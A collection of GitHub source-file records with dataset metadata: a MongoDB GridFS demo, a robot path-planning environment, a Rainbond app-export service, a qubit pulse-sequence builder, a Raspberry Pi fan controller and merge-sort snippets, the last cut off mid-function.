'C:/Success_courses_300k_lifelight/mongodb-top4NOSQL/gridfs-demo/How-to-Save-a-Life-Study-Manual.pdf'\n\n\n\nwith open(path_in,'rb') as filein:\n result = fs.put(filein, content_type='application/pdf', filename='How-to-Save-a-Life-Study-Manual.pdf')\n pprint(result)\n\npath_in = 'C:/Success_courses_300k_lifelight/mongodb-top4NOSQL/gridfs-demo/languagenow_english.jpg'\npath_out = 'C:/Success_courses_300k_lifelight/mongodb-top4NOSQL/gridfs-demo/OUTPUT_languagenow_english.jpg'\n\n\nwith open(path_in,'rb') as filein:\n result = fs.put(filein, filename='languagenow_english.jpg')\n pprint(result)\n\nfile = fs.find_one({'filename': 'languagenow_english.jpg'})\nimage = 
file.read()\nwith open(path_out,\"wb\") as output_file:\n output_file.write(image)\n output_file.close();\n\n\n\n","repo_name":"victorbertoldo/dadobipolar","sub_path":"MongoDB/python_mongo/GRIDFS_Demo.py","file_name":"GRIDFS_Demo.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72111842296","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport numpy as np\nimport cv2\n\nfrom obstacleSpace import isInObstacleWs\n\nclass Environment:\n def __init__(self, resolution, botRadius):\n self.res = resolution\n self.totalClearance = botRadius\n self.startPt = [0.0, 0.0]\n self.goalPt = [8.0,4.5]\n self.MAP_X, self.MAP_Y = 11.1, 10.1\n self.GRID_NX, self.GRID_NY = int(self.MAP_X/self.res), int(self.MAP_Y/self.res)\n self.obstacleSet = self.getObstacleSet()\n \n self.obstacleMap = self.getObstacleMap()\n \n self.runningMap = np.copy(self.obstacleMap)\n self.renderCounter = 0\n \n def getObstacleSet(self):\n outputSet = set([])\n # create the set using for loops\n for p in range(0,int(self.MAP_X/self.res+1)):\n for q in range(0,int(self.MAP_Y/self.res+1)):\n if (isInObstacleWs((p+0.5)*self.res,(q+0.5)*self.res, self.totalClearance)):\n outputSet.add((p,q))\n return outputSet\n \n def isPtInObs(self, x, y):\n temp = self.getGridPt([x,y])\n return temp in self.obstacleSet\n \n def isGridPtInObs(self, pt):\n return pt in self.obstacleSet\n \n def getGridPt(self,pt):\n return (math.floor(pt[0]/self.res), math.floor(pt[1]/self.res))\n \n def updateMap(self,display,pt,val):\n # For Display\n # set up color map for display\n # 0 - empty, white\n # 1 - startPt, red\n # 2 - goalPt, green\n # 3 - visited, yellow\n # 4 - obstacle, black\n # 5 - path, blue\n red =0\n green =0\n blue =0\n if val ==0:\n red,green,blue = 255,255,255\n elif val == 1:\n red,green,blue = 255,0,0\n elif val == 2:\n red,green,blue = 0,255,0\n elif val == 3:\n red,green,blue = 255,255,0\n elif val == 4:\n red,green,blue = 0,0,0\n elif val == 5:\n red,green,blue = 0,0,255\n else:\n # to catch errors\n red,green,blue = 255,0,255\n display[pt[0],pt[1],0] = blue\n display[pt[0],pt[1],1] = green\n display[pt[0],pt[1],2] = red\n return display\n \n def getObstacleMap(self):\n # fill a np array image with obstacles for rendering\n obsMap = 255 * np.ones((self.GRID_NX+1,self.GRID_NY+1,3))\n \n for obs in self.obstacleSet:\n obsMap = self.updateMap(obsMap, obs, 4)\n return obsMap\n \n def render(self):\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.startPt),1)\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.goalPt),2)\n if self.renderCounter%60 == 0:\n toDisplay = cv2.resize(self.runningMap,(self.GRID_NY * 1000 // self.GRID_NX,1000), interpolation = cv2.INTER_AREA)\n cv2.imshow(\"\",np.rot90(toDisplay,1))\n cv2.waitKey(1)\n self.renderCounter+=1\n \n def setVisitedAndRender(self, pt):\n self.runningMap = self.updateMap(self.runningMap,pt,3)\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.goalPt),2)\n if self.renderCounter%60 == 0:\n toDisplay = cv2.resize(self.runningMap,(self.GRID_NY * 1000 // self.GRID_NX,1000), interpolation = cv2.INTER_AREA)\n cv2.imshow(\"\",np.rot90(toDisplay,1))\n cv2.waitKey(1)\n self.renderCounter+=1\n \n def setPathAndRender(self, pt):\n self.runningMap = self.updateMap(self.runningMap,pt,5)\n self.runningMap = self.updateMap(self.runningMap,self.getGridPt(self.startPt),1)\n self.runningMap = 
self.updateMap(self.runningMap,self.getGridPt(self.goalPt),2)\n if self.renderCounter%2 == 0:\n toDisplay = cv2.resize(self.runningMap,(self.GRID_NY * 1000 // self.GRID_NX,1000), interpolation = cv2.INTER_AREA)\n cv2.imshow(\"\",np.rot90(toDisplay,1))\n cv2.waitKey(1)\n self.renderCounter+=1\n \n def reset(self):\n # reset image to obstacle\n self.runningMap = np.copy(self.obstacleMap)\n self.renderCounter = 0\n pass","repo_name":"amrish1222/motionPlanningAlgs","sub_path":"source/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33755161353","text":"import struct\n\nfd_out = open('bin_file', 'wb')\n\n#[2-byte ID][4-byte value]\n\nid = 0\nval = id\n\nfor i in range(50):\n entry = struct.pack('<HI', id, val)\n id += 1\n val = id\n\n fd_out.write(entry)\n fd_out.flush()\n\nfd_out.close()\n","repo_name":"paulohq/cosine","sub_path":"gem_bin_file.py","file_name":"gem_bin_file.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13284258831","text":"# -*- coding: utf8 -*-\n\"\"\"\n Created on 18/5/15.\n\"\"\"\nimport datetime\nimport json\nimport logging\nimport urllib2\n\nimport requests\n\nfrom console.repositories.group import group_repo\nfrom console.repositories.market_app_repo import app_export_record_repo\nfrom console.repositories.region_repo import region_repo\nfrom console.services.app_config.app_relation_service import AppServiceRelationService\nfrom www.apiclient.baseclient import client_auth_service\nfrom www.apiclient.marketclient import MarketOpenAPI\nfrom www.apiclient.regionapi import RegionInvokeApi\nfrom www.tenantservice.baseservice import BaseTenantService\nfrom www.utils.crypt import make_uuid\n\nlogger = logging.getLogger(\"default\")\nbaseService = BaseTenantService()\napp_relation_service = AppServiceRelationService()\nmarket_api = MarketOpenAPI()\nregion_api = RegionInvokeApi()\n\n\nclass AppExportService(object):\n def create_export_repo(self, event_id, export_format, group_key, version):\n export_record = app_export_record_repo.get_export_record_by_unique_key(group_key, version, export_format)\n if export_record:\n return 409, \"已存在改导出类型的文件\", None\n\n if event_id is None:\n event_id = make_uuid()\n params = {\n \"event_id\": event_id,\n \"group_key\": group_key,\n \"version\": version,\n \"format\": export_format,\n \"status\": \"exporting\"\n }\n new_export_record = app_export_record_repo.create_app_export_record(**params)\n return 200, \"success\", new_export_record\n\n def export_current_app(self, team, export_format, app):\n event_id = make_uuid()\n data = {\"event_id\": event_id, \"group_key\": app.group_key, \"version\": app.version, \"format\": export_format,\n \"group_metadata\": app.app_template}\n region = self.get_app_share_region(app)\n if region is None:\n return 404, '无法查找当前应用分享所在数据中心', None\n region_api.export_app(region, team.tenant_name, data)\n export_record = app_export_record_repo.get_export_record_by_unique_key(app.group_key, app.version,\n export_format)\n if export_record:\n logger.debug(\"update export record !\")\n export_record.event_id = event_id\n export_record.status = \"exporting\"\n export_record.update_time = datetime.datetime.now()\n export_record.save()\n new_export_record = export_record\n else:\n logger.debug(\"create export record !\")\n code, msg, new_export_record = 
self.create_export_repo(event_id, export_format, app.group_key, app.version)\n if code != 200:\n return code, msg, None\n return 200, \"success\", new_export_record\n\n def get_app_share_region(self, app):\n app_template = json.loads(app.app_template)\n apps = app_template[\"apps\"]\n first_app = apps[0]\n if first_app:\n region = first_app.get(\"service_region\", None)\n else:\n group = group_repo.get_group_by_id(app.tenant_service_group_id)\n if group:\n region = group.region_name\n else:\n return None\n \n if region:\n region_config = region_repo.get_region_by_region_name(region)\n if region_config:\n return region\n return None\n else:\n return None\n\n\n def get_export_status(self, team, app):\n app_export_records = app_export_record_repo.get_by_key_and_version(app.group_key, app.version)\n rainbond_app_init_data = {\n \"is_export_before\": False,\n }\n docker_compose_init_data = {\n \"is_export_before\": False,\n }\n\n region = self.get_app_share_region(app)\n if region is None:\n return 404, '无法查找当前应用分享所在数据中心', None\n if app_export_records:\n for export_record in app_export_records:\n if export_record.event_id and export_record.status == \"exporting\":\n try:\n res, body = region_api.get_app_export_status(region, team.tenant_name, export_record.event_id)\n result_bean = body[\"bean\"]\n if result_bean[\"status\"] in (\"failed\", \"success\"):\n export_record.status = result_bean[\"status\"]\n export_record.file_path = result_bean[\"tar_file_href\"]\n export_record.save()\n except Exception as e:\n logger.exception(e)\n\n if export_record.format == \"rainbond-app\":\n rainbond_app_init_data.update({\n \"is_export_before\": True,\n \"status\": export_record.status,\n \"file_path\": self._wrapper_director_download_url(region, export_record.file_path.replace(\"/v2\",\"\"))\n })\n if export_record.format == \"docker-compose\":\n docker_compose_init_data.update({\n \"is_export_before\": True,\n \"status\": export_record.status,\n \"file_path\": self._wrapper_director_download_url(region, export_record.file_path.replace(\"/v2\",\"\"))\n })\n\n result = {\"rainbond_app\": rainbond_app_init_data, \"docker_compose\": docker_compose_init_data}\n return 200, \"success\", result\n\n def __get_down_url(self, region_name, raw_url):\n region = region_repo.get_region_by_region_name(region_name)\n if region:\n return region.url + raw_url\n else:\n return raw_url\n\n def _wrapper_director_download_url(self, region_name, raw_url):\n region = region_repo.get_region_by_region_name(region_name)\n if region:\n splits_texts = region.url.split(\":\")\n if len(splits_texts) > 2:\n index = region.url.index(\":\", 6)\n return region.url[:index] + \":6060\" + raw_url\n else:\n return region.url + \":6060\" + raw_url\n\n def get_export_record(self, export_format, app):\n return app_export_record_repo.get_export_record_by_unique_key(app.group_key, app.version,\n export_format)\n\n def get_export_record_status(self, app):\n records = app_export_record_repo.get_by_key_and_version(app.group_key, app.version)\n export_status = \"other\"\n # 有一个成功即成功,全部失败为失败,全部为导出中则显示导出中\n if not records:\n return \"unexported\"\n failed = True\n\n for record in records:\n if record.status == \"success\":\n return \"success\"\n if record.status != \"failed\":\n failed = False\n if failed:\n return \"failed\"\n else:\n return \"exporting\"\n\n def get_file_down_req(self, export_format, tenant_name, app):\n export_record = app_export_record_repo.get_export_record_by_unique_key(app.group_key, app.version,\n export_format)\n region = 
self.get_app_share_region(app)\n\n download_url = self.__get_down_url(region, export_record.file_path)\n file_name = export_record.file_path.split(\"/\")[-1]\n url, token = client_auth_service.get_region_access_token_by_tenant(\n tenant_name, region)\n if not token:\n region_info = region_repo.get_region_by_region_name(region)\n if region_info:\n token = region_info.token\n\n req = urllib2.Request(download_url)\n if token:\n req.add_header(\"Authorization\", \"Token {}\".format(token))\n\n return req, file_name\n\n\nexport_service = AppExportService()\n","repo_name":"sunshine2995/console","sub_path":"console/services/app_import_and_export_service.py","file_name":"app_import_and_export_service.py","file_ext":"py","file_size_in_byte":8017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27147235614","text":"__author__ = 'Nelson'\n\nfrom slab.instruments.awg.PulseSequence import *\nfrom numpy import arange, linspace, array\nfrom slab.experiments.Alex.ExpLib.PulseSequenceBuilder import *\nimport time\nimport visdom\nfrom liveplot import LivePlotClient\n\nclass QubitPulseSequence(PulseSequence):\n '''\n Parent class for all the single qubit pulse sequences.\n '''\n def __init__(self, name, cfg, expt_cfg, define_points, define_parameters, define_pulses, **kwargs):\n\n self.expt_cfg = expt_cfg\n self.cfg = cfg\n define_points()\n define_parameters()\n sequence_length = len(self.expt_pts)\n\n # if \"multimode\" not in name.lower():\n # cfg['awgs'][1]['upload'] = False\n # else:\n # cfg['awgs'][1]['upload'] = True\n calibration_pts = []\n\n if (expt_cfg['use_g-e-f_calibration']):\n calibration_pts = list(range(3))\n sequence_length+=3\n elif (expt_cfg['use_pi_calibration']):\n calibration_pts = list(range(2))\n sequence_length+=2\n print('calibration_pts =', calibration_pts)\n\n PulseSequence.__init__(self, name, cfg['awgs'], sequence_length)\n\n self.psb = PulseSequenceBuilder(cfg)\n self.pulse_sequence_matrix = []\n self.total_pulse_span_length_list = []\n self.total_flux_pulse_span_length_list = []\n self.flux_pulse_span_list = []\n\n for ii, pt in enumerate(self.expt_pts):\n # obtain pulse sequence for each experiment point\n define_pulses(pt)\n\n self.pulse_sequence_matrix.append(self.psb.get_pulse_sequence())\n self.total_pulse_span_length_list.append(self.psb.get_total_pulse_span_length())\n self.total_flux_pulse_span_length_list.append(self.psb.get_total_flux_pulse_span_length())\n\n if len(calibration_pts) > 0:\n\n for jj, pt in enumerate(calibration_pts):\n\n if self.name == 'rabi_thermalizer':\n define_pulses(jj+len(self.expt_pts))\n\n else:\n if jj ==0:\n self.psb.idle(10)\n if jj ==1:\n self.psb.append('q','cal_pi', self.pulse_type)\n if jj ==2:\n self.psb.append('q','cal_pi', self.pulse_type)\n self.psb.append('q', 'pi_q_ef', self.pulse_type)\n\n self.pulse_sequence_matrix.append(self.psb.get_pulse_sequence())\n self.total_pulse_span_length_list.append(self.psb.get_total_pulse_span_length())\n self.total_flux_pulse_span_length_list.append(self.psb.get_total_flux_pulse_span_length())\n\n print('total_pulse_span_length_list', self.total_pulse_span_length_list)\n\n max_length = self.psb.get_max_length(self.total_pulse_span_length_list)\n max_flux_length = self.psb.get_max_flux_length(self.total_flux_pulse_span_length_list)\n self.set_all_lengths(max_length)\n\n ###\n\n # flux pulse\n temp_seq_matrix = self.pulse_sequence_matrix[:]\n self.pulse_sequence_matrix = []\n # clears\n dummy = self.psb.get_total_pulse_span_length()\n 
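# Both getter calls are made purely for their side effect: they reset the builder's accumulated span bookkeeping before the flux pass.\n        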
dummy = self.psb.get_total_flux_pulse_span_length()\n\n flux_max_area_list = np.zeros(8)\n flux_max_power_list = np.zeros(8)\n for ii in range(len(self.expt_pts) + len(calibration_pts)):\n\n if self.name == 'rabi_thermalizer' or self.name == 'histogram_rabi_thermalizer':\n\n # print 'add rabi_thermalizer flux pulse'\n flux_total_span, flux_area_list, flux_power_list = define_pulses(ii, isFlux = True)\n\n flux_max_area_list = np.where(np.abs(flux_max_area_list) >= np.abs(flux_area_list), flux_max_area_list, flux_area_list)\n flux_max_power_list = np.where(flux_max_power_list >= flux_power_list, flux_max_power_list, flux_power_list)\n # flux_total_span = self.psb.get_total_pulse_span_length() # also clears\n\n # 0426 hack for ramsey fast flux scope, ignore cal pts\n # elif self.name == 'ramsey':\n # flux_total_span = self.add_flux_pulses_hack(idx=ii, pulse_span_length = self.total_pulse_span_length_list[ii])\n\n else:\n flux_total_span = self.add_flux_pulses(pulse_span_length = self.total_pulse_span_length_list[ii])\n temp_seqs = self.psb.get_pulse_sequence() # also clears seq\n\n self.flux_pulse_span_list.append(flux_total_span)\n dummy = self.psb.get_total_flux_pulse_span_length()\n\n #print 'flux_pulse_span_list', self.flux_pulse_span_list\n\n self.pulse_sequence_matrix.append(temp_seq_matrix[ii] + temp_seqs) # concatenate hetero/flux pulse\n\n max_flux_length = round_samples( max(self.flux_pulse_span_list)+ 2 * self.psb.start_end_buffer)\n self.set_all_lengths(max(max_flux_length,max_length))\n\n print('max length =', max_length, 'ns')\n print('max flux length =', max_flux_length, 'ns')\n if max(max_flux_length,max_length) >= self.cfg[\"expt_trigger\"][\"period_ns\"]:\n print('Error!! Max sequence length larger than Exp period! ')\n print('flux_max_area_list = [', ', '.join(map(str, flux_max_area_list)), ']')\n print('flux_max_power_list = [', ', '.join(map(str, flux_max_power_list)), ']')\n\n # import csv\n # with open(r'C:\\slab_data_temp\\fast_flux_kernels\\flux_max_area.csv', 'a') as csvfile:\n # ww = csv.writer(csvfile, delimiter=',')\n # ww.writerow(map(str, flux_max_area_list))\n # csvfile.close()\n #\n # with open(r'C:\\slab_data_temp\\fast_flux_kernels\\flux_max_power.csv', 'a') as csvfile:\n # ww = csv.writer(csvfile, delimiter=',')\n # ww.writerow(map(str, flux_max_power_list))\n # csvfile.close()\n\n ###\n\n ###\n # heterodyne pulse - hack: max_length = 0\n if (self.name == 'vacuum_rabi') or (self.name[0:9] == 'histogram') :\n # vacuum_rabi : heterodyne pulses in SingleQubitPulseSeq\n #print 'skip adding heterodyne pulse in QubitPulseSeq'\n pass\n\n else:\n temp_seq_matrix = self.pulse_sequence_matrix[:]\n self.pulse_sequence_matrix = []\n self.add_heterodyne_pulses()\n #self.add_flux_pulses(length=500)\n temp_seqs = self.psb.get_pulse_sequence()\n\n # clears\n dummy = self.psb.get_total_pulse_span_length()\n dummy = self.psb.get_total_flux_pulse_span_length()\n\n for ii in range(len(self.expt_pts)+len(calibration_pts)):\n self.pulse_sequence_matrix.append(temp_seq_matrix[ii] + temp_seqs) # concatenate hetero/flux pulse\n ###\n\n\n def add_flux_pulses(self, pulse_span_length):\n\n #print pulse_span_length\n\n # this is to align flux pulse to readout? 
(diff in 2 pxdac cards)\n hw_delay = self.cfg['flux_pulse_info']['pxdac_hw_delay']\n\n if self.cfg['flux_pulse_info']['on_during_drive'] and self.cfg['flux_pulse_info']['on_during_readout']:\n\n flux_width = max(pulse_span_length + self.cfg['readout']['delay'] + self.cfg['readout']['width'] \\\n - self.cfg['flux_pulse_info']['flux_drive_delay'], 0)\n flux_comp_width = flux_width # self.cfg['flux_pulse_info']['dc_comp_pulse_length']\n flux_delay = self.cfg['flux_pulse_info']['flux_drive_delay'] + hw_delay\n flux_idle = 100.0\n\n elif (self.cfg['flux_pulse_info']['on_during_drive']) and (\n not self.cfg['flux_pulse_info']['on_during_readout']):\n\n flux_width = max(pulse_span_length - self.cfg['flux_pulse_info']['flux_drive_delay'], 0)\n flux_comp_width = flux_width # self.cfg['flux_pulse_info']['dc_comp_pulse_length']\n flux_delay = self.cfg['flux_pulse_info']['flux_drive_delay'] + hw_delay\n flux_idle = self.cfg['readout']['delay'] + self.cfg['readout']['width'] + 100\n\n elif (not self.cfg['flux_pulse_info']['on_during_drive']) and (\n self.cfg['flux_pulse_info']['on_during_readout']):\n\n flux_width = self.cfg['readout']['delay'] + self.cfg['readout']['width']\n flux_comp_width = flux_width # self.cfg['flux_pulse_info']['dc_comp_pulse_length']\n flux_delay = hw_delay + pulse_span_length\n flux_idle = 100.0\n\n else:\n flux_width = 0\n flux_comp_width = 0\n flux_delay = 0\n flux_idle = 0\n\n flux_a = self.cfg['flux_pulse_info']['flux_a']\n flux_freq = self.cfg['flux_pulse_info']['flux_freq']\n\n flux_mod_freq = self.cfg['flux_pulse_info']['flux_mod_freq']\n flux_mod_a = self.cfg['flux_pulse_info']['flux_mod_a']\n\n #print 'desired flux_width= ', flux_width, ', delay=', flux_delay\n\n flux_total_span_list = []\n for ii in range(8):\n\n flux_comp_a = - flux_a[ii] # flux_area/float(flux_comp_width)\n\n if flux_width > 0:\n self.psb.append('flux_'+str(ii), 'general', 'square', amp=flux_a[ii],\n length = flux_width, freq = flux_freq[ii],\n delay = flux_delay)\n\n # # hard rise/end for now\n # self.psb.append('flux_'+str(ii), 'general', 'linear_ramp_with_mod', start_amp=flux_a[ii],\n # stop_amp=flux_a[ii], length=flux_width, \\\n # mod_amp=flux_mod_a[ii], mod_freq=flux_mod_freq[ii], mod_start_phase=0.0, delay = flux_delay)\n\n if flux_comp_width > 0:\n self.psb.append('flux_' + str(ii), 'general', 'square', amp=flux_comp_a,\n length = flux_comp_width, freq = flux_freq[ii],\n delay = flux_delay + flux_idle)\n\n # also clears\n flux_total_span_list.append(self.psb.get_total_pulse_span_length())\n\n return max(flux_total_span_list)\n\n def add_flux_pulses_hack(self, idx, pulse_span_length):\n\n # only for ramsey fast flux scope\n\n if idx >= len(self.expt_pts):\n # cal pts\n return 0.0\n\n else:\n # this is to align flux pulse to readout? 
(diff in 2 pxdac cards)\n hw_delay = self.cfg['flux_pulse_info']['pxdac_hw_delay']\n\n flux_width = self.expt_cfg['flux_width']\n flux_comp_width = flux_width\n\n self.cfg['pulse_info']['square']['ramp_sigma'] = 0.0\n\n gap = 50\n flux_delay = self.cfg['pulse_info']['gauss']['half_pi_length']*4 + gap + hw_delay\n flux_idle = (pulse_span_length - flux_delay - flux_width) \\\n + self.cfg['readout']['delay'] + self.cfg['readout']['width'] + 100\n\n flux_a = self.cfg['flux_pulse_info']['flux_a']\n flux_freq = self.cfg['flux_pulse_info']['flux_freq']\n flux_mod_freq = self.cfg['flux_pulse_info']['flux_mod_freq']\n flux_mod_a = self.cfg['flux_pulse_info']['flux_mod_a']\n\n flux_total_span_list = []\n for ii in range(8):\n\n flux_comp_a = - flux_a[ii] # flux_area/float(flux_comp_width)\n\n if flux_width > 0:\n self.psb.append('flux_'+str(ii), 'general', 'square', amp=flux_a[ii],\n length = flux_width, freq = flux_freq[ii],\n delay = flux_delay)\n\n if flux_comp_width > 0:\n self.psb.append('flux_' + str(ii), 'general', 'square', amp=flux_comp_a,\n length = flux_comp_width, freq = flux_freq[ii],\n delay = flux_delay + flux_idle)\n\n # also clears\n flux_total_span_list.append(self.psb.get_total_pulse_span_length())\n\n return max(flux_total_span_list)\n\n def add_heterodyne_pulses(self, hetero_read_freq = None, hetero_a = None):\n\n # todo: seems to have bug here? not the same w/ or w/o hetero_read_freq & hetero_a\n # print hetero_read_freq\n if hetero_read_freq is not None:\n\n het_carrier_freq = hetero_read_freq - self.cfg['readout']['heterodyne_freq']\n het_read_freq_list = array([hetero_read_freq])\n if hetero_a is None:\n het_a_list = array([self.cfg['readout']['heterodyne_a']])\n else:\n het_a_list = array([hetero_a])\n het_IFreqList = het_read_freq_list - het_carrier_freq\n\n else:\n if self.cfg['readout']['is_multitone_heterodyne']:\n het_carrier_freq = self.cfg['readout']['heterodyne_carrier_freq']\n het_read_freq_list = array(self.cfg['readout']['heterodyne_freq_list'])\n het_a_list = array(self.cfg['readout']['heterodyne_a_list'])\n het_IFreqList = het_read_freq_list - het_carrier_freq\n else:\n het_carrier_freq = self.cfg['readout']['frequency'] - self.cfg['readout']['heterodyne_freq']\n het_read_freq_list = array([self.cfg['readout']['frequency']])\n het_a_list = array([self.cfg['readout']['heterodyne_a']])\n het_IFreqList = het_read_freq_list - het_carrier_freq\n\n # print('het_carrier_freq', het_carrier_freq)\n # print('het_read_freq_list', het_read_freq_list)\n # print('het_a_list', het_a_list)\n # print('het_IFreqList', het_IFreqList)\n\n het_phase_list = [(self.cfg['readout']['start_phase'] + self.cfg['readout']['phase_slope'] * ii )%360\n for ii in het_read_freq_list]\n # het_phase_list = [0.0 for ii in het_IFreqList]\n\n if sum(het_a_list) > 1:\n print('Warning! 
Sum of heterodyne amplitudes > 1 in QubitPulseSequence.')\n\n if not self.cfg['readout']['is_fast_awg']:\n\n for ii in range(len(het_IFreqList)):\n # q2 pulses are hacked to be fixed in time, so can append multiple pulses for heterodyne readout\n self.psb.append('hetero', 'general', 'square', amp= het_a_list[ii],\n length=self.cfg['readout']['width'],\n freq= het_IFreqList[ii],\n phase=het_phase_list[ii],\n delay=self.cfg['readout']['width']/2.0 + self.cfg['readout']['delay'])\n else:\n\n # heterodyne carrier - LO\n self.psb.append('hetero_carrier', 'general', 'square', amp=self.cfg['readout']['hetero_carrier_a'],\n length=self.cfg['readout']['width'],\n freq=het_carrier_freq,\n delay=self.cfg['readout']['width'] / 2.0 + self.cfg['readout']['delay'])\n if self.cfg['readout']['is_hetero_phase_ref']:\n # hetero phase reference to solve alazar jitter\n self.psb.append('hetero_carrier', 'general', 'square', amp=self.cfg['readout']['hetero_phase_ref_a'],\n length=self.cfg['readout']['width'],\n freq=self.cfg['readout']['hetero_phase_ref_freq'],\n delay=self.cfg['readout']['width'] / 2.0 + self.cfg['readout']['delay'])\n # fast awg: read_freq\n for ii in range(len(het_IFreqList)):\n # pulses are hacked to be fixed in time, so can append multiple pulses for heterodyne readout\n self.psb.append('hetero', 'general', 'square', amp= het_a_list[ii],\n length=self.cfg['readout']['width'],\n freq=het_read_freq_list[ii],\n phase=het_phase_list[ii],\n delay=self.cfg['readout']['width'] / 2.0 + self.cfg['readout']['delay'])\n\n def build_sequence(self):\n\n PulseSequence.build_sequence(self)\n\n self.waveforms_dict = {}\n self.waveforms_tpts_dict = {}\n\n for awg in self.awg_info:\n for waveform in awg['waveforms']:\n self.waveforms_dict[waveform['name']] = self.waveforms[waveform['name']]\n self.waveforms_tpts_dict[waveform['name']] = self.get_waveform_times(waveform['name'])\n\n start_time = time.time()\n print('\\nStart building sequences...(QubitPulseSequence.py)')\n\n self.psb.prepare_build(self.waveforms_tpts_dict,self.waveforms_dict)\n\n generated_sequences = self.psb.build(self.pulse_sequence_matrix,self.total_flux_pulse_span_length_list)\n self.waveforms_dict = generated_sequences\n\n for waveform_key in self.waveforms_dict:\n self.waveforms[waveform_key] = self.waveforms_dict[waveform_key]\n\n end_time = time.time()\n print('Finished building sequences in', end_time - start_time, 'seconds.\\n')\n\n # np.save('S:\\\\_Data\\\\160711 - Nb Tunable Coupler\\\\data\\\\waveform.npy',self.waveforms['qubit drive Q'])\n ### in ipython notebook: call np.load('file_path/file_name.npy')\n\n if self.cfg[\"visdom_plot_seq\"]:\n\n print('Plotting sequences in Visdom...')\n print('Plot seq list (cfg):', self.cfg[\"visdom_plot_seq_list\"])\n\n viz = visdom.Visdom()\n assert viz.check_connection(), \"Visdom server not connected!\"\n # added two environments \"seq_builder.json\", and \"live_plot.json\" in C:\\Users\\slab\\.visdom\n eid = \"seq_builder\"\n viz.close(win=None, env=eid)\n\n for sequence_id in self.cfg[\"visdom_plot_seq_list\"]: #range(len(self.pulse_sequence_matrix)):\n\n win = viz.line(\n X=np.arange(0, 1),\n Y=np.arange(0, 1),\n env=eid,\n opts=dict( height=750, width=1800, title='Seq #%d' % sequence_id, showlegend=True, xlabel='Time to origin (ns)'))\n\n for waveform_key in self.waveforms_dict:\n\n viz.updateTrace(\n X= self.waveforms_tpts_dict[waveform_key] - self.psb.origin,\n Y= self.waveforms_dict[waveform_key][sequence_id] ,\n env=eid, win = win, name = waveform_key, append = False)\n\n\n def 
reshape_data(self, data):\n return np.reshape(data, (self.sequence_length, self.waveform_length))","repo_name":"SchusterLab/slab","sub_path":"slab/experiments/Alex/ExpLib/QubitPulseSequence.py","file_name":"QubitPulseSequence.py","file_ext":"py","file_size_in_byte":18355,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"42812305270","text":"# Importamos numpy\nimport numpy as np\n\n# Ejercicio 4\ndef ex4_jonathan_valle():\n ## Generar numeros de 0 a 80 con una dimension de 4x3\n a = np.random.randint(81, size=(4,3))\n # Cambiar la matriz de 4x3 por 3x4\n b = a.reshape(3,4)\n # Eliminar la ultima columna de la matriz (axis=1) para indicar que es columna\n c = np.delete(b, 3, axis=1)\n # Obtenemos la ultima fila\n i = c[-1,-1]\n # Insertamos la fila obtenida a la ultima columna\n fila = np.insert(c, 3, i, axis=1)\n # Al retornar varios resultados, lo ponemos dentro de un parantesis y con una coma\n return (a, b, c, fila)\nex4_jonathan_valle()\n","repo_name":"jgimenezbalmes/M7_UF2_practica9","sub_path":"exercici4_jonathanValle.py","file_name":"exercici4_jonathanValle.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16463015605","text":"\n\nimport RPi.GPIO as GPIO\nimport time\nimport datetime\nimport pytz\n\nfrom threading import Thread\nimport _thread\nimport serial\n\nfanPin = 23\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(fanPin, GPIO.OUT)\n\nfanState = False\nGPIO.output(fanPin, GPIO.LOW)\n\ndef turnOnFan():\n global fanState\n GPIO.output(fanPin, GPIO.HIGH)\n fanState = True \n print(\"turn on fan\") \n \ndef turnOffFan():\n global fanState\n GPIO.output(fanPin, GPIO.LOW)\n fanState = False\n print(\"turn off fan\") \n\n\ndef get_cpu_temperature():\n try:\n tFile = open('/sys/class/thermal/thermal_zone0/temp')\n temp = float(tFile.read())\n tFile.close()\n tempC = temp/1000\n #print(tempC)\n return tempC\n except:\n tFile.close()\n GPIO.cleanup()\n\n\ndef fanAndTempLOOP():\n while True:\n if(fanState == False):\n if(get_cpu_temperature() > 50):\n turnOnFan()\n if(fanState == True):\n if(get_cpu_temperature() < 45):\n turnOffFan()\n time.sleep(1)\n \n_thread.start_new_thread(fanAndTempLOOP, ())","repo_name":"qtechdesign/qtech","sub_path":"FPS/tools/firmware/qtech-lora-gateway/lib_fanAndTemp.py","file_name":"lib_fanAndTemp.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26996738101","text":"def mergeSort(arr):\n\t# 归并\n\tdef merge(left, right):\n\t\tresult = []\n\t\ti = j = 0\n\t\twhile i < len(left) and j < len(right):\n\t\t\tif left[i] <= right[j]:\n\t\t\t\tresult.append(left[i])\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tresult.append(right[j])\n\t\t\t\tj += 1\n\t\tresult = result + left[i:] + right[j:] # 剩余的元素直接添加至末尾\n\t\treturn result\n\t# 递归\n\tif len(arr) <= 1:\n\t\treturn arr\n\tmid = len(arr) // 2\n\tleft = mergeSort(arr[:mid])\n\tright = mergeSort(arr[mid:])\n\treturn merge(left, right)\n\n\n# # 算法导论,可以运行,但未测试\ndef merge(A, p, q, r):\n\tN1 = A[p : q+1]\n\tN2 = A[q+1 : r+1]\n\tpointer = p\n\twhile N1 and N2:\n\t\tif N1[0] <= N2[0]:\n\t\t\tA[pointer] = N1.pop(0)\n\t\telse:\n\t\t\tA[pointer] = N2.pop(0)\n\t\tpointer += 1\n\ttail = N1 if N1 else N2 # 落单的那个\n\tfor last in tail:\n\t\tA[k] = 